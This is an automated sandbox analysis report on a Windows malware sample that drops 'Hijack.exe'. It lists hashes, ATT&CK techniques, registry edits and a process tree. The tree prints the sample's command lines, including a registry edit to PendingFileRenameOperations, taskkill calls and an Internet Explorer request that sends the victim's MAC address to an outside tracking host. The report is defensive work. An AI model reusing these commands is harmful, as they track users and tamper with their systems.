22f51ffb079bc62d0373d6a7c36eb9f7806535ddf8041a89afabf255fe863060

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2024 06:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe
Size

116KB
MD5

eac0ca3d2b45f2163a429673883d432e
SHA1

9cb19ed45145dd35cbe916d7fb20fd0b49722a70
SHA256

22f51ffb079bc62d0373d6a7c36eb9f7806535ddf8041a89afabf255fe863060
SHA512

334898e8011b5ae358163442c3a7b3f88312a35b89d928042599c1a8473eeb390a75ed51d94080cfc492c37cca7cd55b29a729155f1ebc895936bb774c12f28f
SSDEEP

3072:349KDsVqDJVAh/0sInP3kKuwSDd1o3PR2o:uqDJmGsInP3kTviPR2o

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4880	Hijack.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft.Nick\Hijack.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft.Nick\Hijack.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft.Nick\Hijack.bat	Hijack.exe

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hijack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2132	PING.EXE
2256	PING.EXE

Kills process with taskkill 2 IoCs

evasion

pid	Process
2256	taskkill.exe
228	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 19 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{F7BC6753-764F-11EF-84CD-D2EB330F3545} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2132	PING.EXE
2256	PING.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	228	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4108	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2736	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe
4880	Hijack.exe
4108	IEXPLORE.EXE
4108	IEXPLORE.EXE
2916	IEXPLORE.EXE
2916	IEXPLORE.EXE
4108	IEXPLORE.EXE
4108	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 4756	2736	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe	82
PID 2736 wrote to memory of 4756	2736	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe	82
PID 2736 wrote to memory of 4756	2736	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe	82
PID 4756 wrote to memory of 2132	4756	cmd.exe	84
PID 4756 wrote to memory of 2132	4756	cmd.exe	84
PID 4756 wrote to memory of 2132	4756	cmd.exe	84
PID 4756 wrote to memory of 4880	4756	cmd.exe	85
PID 4756 wrote to memory of 4880	4756	cmd.exe	85
PID 4756 wrote to memory of 4880	4756	cmd.exe	85
PID 4756 wrote to memory of 2256	4756	cmd.exe	86
PID 4756 wrote to memory of 2256	4756	cmd.exe	86
PID 4756 wrote to memory of 2256	4756	cmd.exe	86
PID 4880 wrote to memory of 5108	4880	Hijack.exe	87
PID 4880 wrote to memory of 5108	4880	Hijack.exe	87
PID 4880 wrote to memory of 5108	4880	Hijack.exe	87
PID 5108 wrote to memory of 1720	5108	cmd.exe	89
PID 5108 wrote to memory of 1720	5108	cmd.exe	89
PID 5108 wrote to memory of 1720	5108	cmd.exe	89
PID 4880 wrote to memory of 4108	4880	Hijack.exe	99
PID 4880 wrote to memory of 4108	4880	Hijack.exe	99
PID 4108 wrote to memory of 2916	4108	IEXPLORE.EXE	100
PID 4108 wrote to memory of 2916	4108	IEXPLORE.EXE	100
PID 4108 wrote to memory of 2916	4108	IEXPLORE.EXE	100
PID 4880 wrote to memory of 2256	4880	Hijack.exe	101
PID 4880 wrote to memory of 2256	4880	Hijack.exe	101
PID 4880 wrote to memory of 2256	4880	Hijack.exe	101
PID 4880 wrote to memory of 1916	4880	Hijack.exe	103
PID 4880 wrote to memory of 1916	4880	Hijack.exe	103
PID 4108 wrote to memory of 4232	4108	IEXPLORE.EXE	104
PID 4108 wrote to memory of 4232	4108	IEXPLORE.EXE	104
PID 4108 wrote to memory of 4232	4108	IEXPLORE.EXE	104
PID 4880 wrote to memory of 228	4880	Hijack.exe	105
PID 4880 wrote to memory of 228	4880	Hijack.exe	105
PID 4880 wrote to memory of 228	4880	Hijack.exe	105

C:\Users\Admin\AppData\Local\Temp\eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\\nResurrection.bat
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4756
- - C:\Windows\SysWOW64\PING.EXE
    ping -a 127.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2132
- - C:\Program Files\Microsoft.Nick\Hijack.exe
    "C:\Program Files\Microsoft.Nick\Hijack.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\\MoveFileIniti.bat
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5108
    - - C:\Windows\SysWOW64\reg.exe
        
        Reg Add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "PendingFileRenameOperations" /t REG_MULTI_SZ /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1720
  - - C:\Program Files\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.xxx.com/tongji/count.asp?mac=D2-EB-33-0F-35-45&mdx=1c383cd30b7c298ab50293adfecb7b186c8349cc7260ae62e3b1396831a8398f&ver=55-46-03-77-3
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4108
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4108 CREDAT:17410 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2916
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4108 CREDAT:17414 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4232
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /pid 4108
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2256
  - - C:\Program Files\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.xxx.com/tongji/count.asp?mac=D2-EB-33-0F-35-45&mdx=1c383cd30b7c298ab50293adfecb7b186c8349cc7260ae62e3b1396831a8398f&ver=55-46-03-77-3
      4⤵
      Modifies Internet Explorer settings
      PID:1916
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /pid 1916
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:228
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft.Nick\Hijack.exe

Filesize
116KB

MD5
eac0ca3d2b45f2163a429673883d432e

SHA1
9cb19ed45145dd35cbe916d7fb20fd0b49722a70

SHA256
22f51ffb079bc62d0373d6a7c36eb9f7806535ddf8041a89afabf255fe863060

SHA512
334898e8011b5ae358163442c3a7b3f88312a35b89d928042599c1a8473eeb390a75ed51d94080cfc492c37cca7cd55b29a729155f1ebc895936bb774c12f28f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\cy80vnp\imagestore.dat

Filesize
1KB

MD5
0f21636700b24ad0dea870259503a9c2

SHA1
b2d8dccbc36a5a49eb497ca68dd4fd54cefbe38a

SHA256
f25f1a2fcdd6a69f9f0890af7f174526bea0176203b0b4bae5006f06b5c969be

SHA512
0a32cd71582ea3fc6c1f84593a670874b891e726cd433502b4c5195f760778fba39de8cbdf2b3c798f349883db7e0431652cd91196d8b66f6412b61a76cfd160

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\JACP9GNT\favicon-32x32[1].png

Filesize
1KB

MD5
18b70ea3cb125bf5e013fdcc129b8a0f

SHA1
73dde278643cd8be8b8286366db8e9eb21fdb111

SHA256
5ac204c00fc8a6e43f410859cd45a1f9581a68c8d9ed22f80871291298fecd0d

SHA512
165fab4a10185ccb7d3874104e450d344f9ec9b9de51051fc7af460e11b6c04589eb4b96ca5d85ad024b55f294bcd383d339c3a0fcc3e17b9cbf3854f034b504

Download Submit
C:\Users\Admin\AppData\Local\Temp\MoveFileIniti.bat

Filesize
123B

MD5
93016e1fcb6092272dda139e3e96e80e

SHA1
ff7093b48436e88e0a62ab26d071400061a57132

SHA256
497a5b0d281b2aa8b136bd9b05d55af8babc049f2de402caabd6dd9d01e40c22

SHA512
2cfba693919a050e4389a8915321accdebb2aa3430949aef86a3741e72044a3c2f5a1c2b75196af8ef725d613e57d0f9525282f434b56c1a4ea2adc390b21983

Download Submit
C:\Users\Admin\AppData\Local\Temp\nResurrection.bat

Filesize
313B

MD5
f292e8a3f9b09a15b71e0f9fded9c890

SHA1
701527bc37bb3d81467a3798030ceb02549660e4

SHA256
59b0db4235eae4967e06887a8e9024c020d11283b44713195f320926e3893f46

SHA512
e156abd1f2d8ebc17b36e0d102457c2d483591f5815825bba8c88a2403d899ba7e09dfed6560af1608b40a1b6ebfb7fd57d9dbcfa67e386dd7ee4f3f4395d446

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads